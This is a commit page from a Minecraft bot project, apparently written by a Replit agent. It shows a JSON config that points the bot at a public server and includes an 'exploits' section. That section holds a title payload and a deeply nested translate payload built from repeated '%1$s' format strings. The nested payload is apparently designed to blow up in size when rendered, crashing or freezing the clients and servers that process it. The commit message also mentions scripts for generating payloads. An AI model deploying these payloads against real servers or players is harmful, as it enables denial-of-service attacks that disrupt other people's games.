This commit introduces several new features and improvements to the Minecraft bot project, including: - Addition of the `mineflayer` library and associated configuration files. - Implementation of a new `etabot` module with a license, README, configuration, crash logs, and utility scripts for generating payloads and filtering. - Updates to `index.js` to integrate the `mineflayer` library and new bot functionalities. - Creation of `multibot.js` for managing multiple bots and `orbit.js` for bot orbiting behavior. - Enhancements to utility files like `core.js`, `selfcare.js`, and `tellrawBuilder.js` for better bot interaction and management. - Updates to `package.json` to include new dependencies. Replit-Commit-Author: Agent Replit-Commit-Session-Id: cf33d97e-6747-48a4-b6c2-f7a9f6559106 Replit-Commit-Checkpoint-Type: intermediate_checkpoint
17 lines
1.2 KiB
JSON
17 lines
1.2 KiB
JSON
{
|
|
"core": {
|
|
"width": 10,
|
|
"height": 10,
|
|
"depth": 10,
|
|
"y": -45
|
|
},
|
|
"bot": {
|
|
"host": "chipmunk.land",
|
|
"port": 25565,
|
|
"ver": "1.19.4"
|
|
},
|
|
"exploits": {
|
|
"titlePayload": "{\"entity\":\"@e\",\"nbt\":\"\"}",
|
|
"translatePayload": "{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"translate\":\"%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s%1$s\",\"with\":[{\"color\":\"#123456\",\"text\":\"7\"}]}]}]}]}]}]}]}]}"
|
|
}
|
|
} |